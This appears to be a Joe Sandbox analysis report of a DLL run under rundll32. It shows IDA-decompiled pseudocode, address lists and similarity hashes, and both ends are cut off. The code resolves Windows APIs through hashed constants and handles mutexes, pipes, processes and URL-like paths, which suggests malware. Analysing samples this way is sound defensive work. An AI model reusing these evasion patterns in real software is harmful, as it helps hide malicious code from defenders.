                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
                  • Opcode ID: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction ID: 378f6602c2b1250aa9488984ecc26cdba5ebabec116acb0dc11713ee51ebb5a5
                  • Opcode Fuzzy Hash: 3abbf9810bb3c5e620b32a2dd9f1b3a1cda1bf4db2d5332f5b3a00b2673bdb8e
                  • Instruction Fuzzy Hash: 4E41AD71314B8982EB93CB66E4613E977A4FB8CBC4F048021EA4987B95DF38D64CCB01
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeaveSystemTime_snprintflstrlen
                  • String ID:
                  • API String ID: 2518601019-0
                  • Opcode ID: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction ID: d9d6c815191b5ef41651c0c787a8a8ca67448b671f5da5a3966f0d0395a17d9c
                  • Opcode Fuzzy Hash: 6bbdaee708397e269f1719576e0b408813d3eaae43c78365dabaa5161097e835
                  • Instruction Fuzzy Hash: C9313B36208B8486D795CF12F8447AAB761F789BD5F448026EE8A43B24EF3CD549CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: File$Heap$AllocCloseCreateErrorFreeHandleLastReadSize
                  • String ID:
                  • API String ID: 4260168601-0
                  • Opcode ID: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction ID: dbc3ca4fbdf92ddb3d6ab0fb3fd3743db26333d8f93616b96f69221312f2bdc0
                  • Opcode Fuzzy Hash: 95c6153764ce9edb243c7aab14e288f80f1312c95db6219c76ea6eb6d084c666
                  • Instruction Fuzzy Hash: 3431413120478986F7A2CB56A8447DAB6D0B74CBE5F44C325EEA9477D4DF78C68E8B00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocCreateErrorFreeLastProcessmemcpymemset
                  • String ID: h
                  • API String ID: 1962595928-2439710439
                  • Opcode ID: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction ID: 4743b7abae4fc84edbe905cfc6942fba1d9a030ece9545f382f76fd41ef8ffd2
                  • Opcode Fuzzy Hash: 598079d7ebde3786078e4e8496c9395ee778a1e9a6aa669798a3687931c5e084
                  • Instruction Fuzzy Hash: 5E312F32204A89DAE7A1DF16F8447CAB7A4F7887D4F458125EA8D83B54DF78C64ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: CloseHandle$ProcessTerminate
                  • String ID:
                  • API String ID: 1541851893-0
                  • Opcode ID: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction ID: 6aea6e80272aa285d695e7919669a58fbc0d4d182d54ab24a0e74719d0bdf862
                  • Opcode Fuzzy Hash: 87714ba418a4876f44f41e607543c34b556ed111d7d5074f5947d895b051b476
                  • Instruction Fuzzy Hash: 27017D35701A49C1EB96DF66D8547A97361FB8CFD5F05C021AE1E82725DE28C64DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 26%
                  			E000000011800020DC(long long* __rax, long long __rbx, void* __rcx, intOrPtr* __rdx, long long __rsi) {
                  				intOrPtr _t43;
                  				intOrPtr _t44;
                  				signed int _t45;
                  				long long* _t81;
                  				void* _t82;
                  				void* _t83;
                  				long long* _t84;
                  				void* _t104;
                  				long long _t108;
                  				void* _t111;
                  				void* _t112;
                  				void* _t121;
                  				int _t123;
                  				int _t126;
                  				void* _t129;
                  				CHAR* _t131;
                  
                  				_t81 = __rax;
                  				 *((long long*)(_t111 + 8)) = __rbx;
                  				 *((long long*)(_t111 + 0x18)) = _t108;
                  				 *((long long*)(_t111 + 0x20)) = __rsi;
                  				_t112 = _t111 - 0x1c0;
                  				_t109 =  *0x8000d4a0;
                  				r14d = 0;
                  				 *(_t112 + 0x1f8) = lstrlenA(_t131);
                  				memset(_t129, _t126, _t123);
                  				_t6 = _t104 + 1; // 0x1
                  				_t7 = _t129 + 2; // 0x2
                  				r11d = _t7;
                  				r8d = _t6;
                  				 *__rdx = r11w;
                  				HeapAlloc(_t104, ??);
                  				if (__rax == 0) goto 0x80002287;
                  				memcpy(??, ??, ??);
                  				_t43 =  *((intOrPtr*)(__rax));
                  				if (_t43 == dil) goto 0x80002192;
                  				if (_t43 == 0x3a) goto 0x8000218d;
                  				_t44 =  *((intOrPtr*)(__rax + 1));
                  				if (_t44 != dil) goto 0x8000217d;
                  				if (_t44 != dil) goto 0x80002195;
                  				_t121 = _t104;
                  				if (_t121 == _t104) goto 0x800021d9;
                  				_t8 = _t121 + 1; // 0x1
                  				 *_t121 = dil;
                  				if (_t8 == _t104) goto 0x800021d9;
                  				if (E000000011800038F8(_t8, __rcx, _t112 + 0x1f8) == 0) goto 0x80002279;
                  				_t45 =  *(_t112 + 0x1f8) & 0x0000ffff;
                  				asm("ror cx, 0x8");
                  				 *(__rdx + 2) = _t45;
                  				if (_t45 == 0) goto 0x80002279;
                  				E0000000118000459C(0x25fff021, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t81 == _t104) goto 0x800021f5;
                  				 *_t81();
                  				goto 0x800021f8;
                  				_t82 = _t104;
                  				if (_t82 != _t104) goto 0x8000224d;
                  				E0000000118000459C(0xb27f4910, _t82,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t82 == _t104) goto 0x8000221e;
                  				 *_t82();
                  				goto 0x80002220;
                  				if (0 != 0) goto 0x80002249;
                  				r14d = 1;
                  				E0000000118000459C(0x25fff021, _t82,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t82 == _t104) goto 0x80002241;
                  				 *_t82();
                  				goto 0x80002244;
                  				_t83 = _t104;
                  				if (_t83 != _t104) goto 0x8000224d;
                  				goto 0x8000225f;
                  				_t84 =  *((intOrPtr*)(_t83 + 0x18));
                  				 *((intOrPtr*)(__rdx + 4)) =  *((intOrPtr*)( *_t84));
                  				if (r14d == 0) goto 0x80002279;
                  				E0000000118000459C(0x9cb92d3f, _t84,  *((intOrPtr*)(_t109 + 0x30)));
                  				if (_t84 == _t104) goto 0x80002279;
                  				 *_t84();
                  				HeapFree(??, ??, ??);
                  				return 1;
                  			}



















                  0x1800020dc
                  0x1800020dc
                  0x1800020e1
                  0x1800020e6
                  0x1800020f4
                  0x1800020fb
                  0x180002112
                  0x180002122
                  0x180002136
                  0x18000213b
                  0x18000213e
                  0x18000213e
                  0x180002142
                  0x18000214a
                  0x180002151
                  0x18000215d
                  0x18000216c
                  0x180002171
                  0x18000217b
                  0x180002180
                  0x180002185
                  0x18000218b
                  0x180002190
                  0x180002192
                  0x180002198
                  0x18000219a
                  0x18000219e
                  0x1800021a4
                  0x1800021b9
                  0x1800021bf
                  0x1800021c7
                  0x1800021cb
                  0x1800021d3
                  0x1800021e4
                  0x1800021ec
                  0x1800021f1
                  0x1800021f3
                  0x1800021f5
                  0x1800021fb
                  0x180002206
                  0x18000220e
                  0x18000221a
                  0x18000221c
                  0x180002222
                  0x18000222a
                  0x180002230
                  0x180002238
                  0x18000223d
                  0x18000223f
                  0x180002241
                  0x180002247
                  0x18000224b
                  0x18000224d
                  0x18000225b
                  0x180002262
                  0x18000226d
                  0x180002275
                  0x180002277
                  0x180002281
                  0x1800022a9

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.310871508.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000005.00000002.310865935.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310900783.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000005.00000002.310913777.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrlenmemcpymemset
                  • String ID: lJu
                  • API String ID: 1735321128-4100297759
                  • Opcode ID: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction ID: f04020e7afacaa342a0f02f17fd00bf906b29f7f5bb121ef27d08f96d68cd7ee
                  • Opcode Fuzzy Hash: d5c37469df4fda8eac190539a58a31bd497cd0413708541462a44a7583b64b03
                  • Instruction Fuzzy Hash: D7510C32304A9C96EAE3DBA299143EA7792F78CBC4F59C021FE5947755DD39CE898300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E00000001180005DF8(long long __rbx, intOrPtr* __rcx, void* __r8) {
                  				signed long long _t88;
                  				long _t111;
                  				void* _t114;
                  				long _t117;
                  				void* _t121;
                  				void* _t122;
                  				long _t130;
                  				void* _t133;
                  
                  				 *((long long*)(_t121 + 0x18)) = __rbx;
                  				_t122 = _t121 - 0x30;
                  				_t88 =  *0x8000d4a0;
                  				r13d = 0;
                  				 *(__rcx + 0x5c) = r13d;
                  				 *(_t122 + 0x68) = r13d;
                  				if ( *((intOrPtr*)(__rcx + 0x58)) != r13d) goto 0x80005fbc;
                  				 *(_t122 + 0x60) = 4;
                  				E0000000118000459C(0x5431d47a, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e56;
                  				 *_t88();
                  				goto 0x80005e59;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005e9d;
                  				_t10 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t10;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				goto 0x80005ea0;
                  				if (r13d == r13d) goto 0x80005fb4;
                  				 *(_t122 + 0x68) = r13d;
                  				 *(_t122 + 0x60) = r13d;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005eea;
                  				_t19 = _t122 + 0x68; // 0xa
                  				r9d = 0;
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t19;
                  				 *((long long*)(_t122 + 0x20)) = _t122 + 0x60;
                  				 *_t88();
                  				r8d =  *(_t122 + 0x60);
                  				HeapAlloc(_t133, _t130, _t111);
                  				if (_t88 == _t133) goto 0x80005fad;
                  				E0000000118000459C(0xbe782669, _t88,  *((intOrPtr*)( *__rcx + 0x50)));
                  				if (_t88 == _t133) goto 0x80005f43;
                  				_t27 = _t122 + 0x68; // 0xa
                  				r8d = 0;
                  				 *((long long*)(_t122 + 0x28)) = _t27;
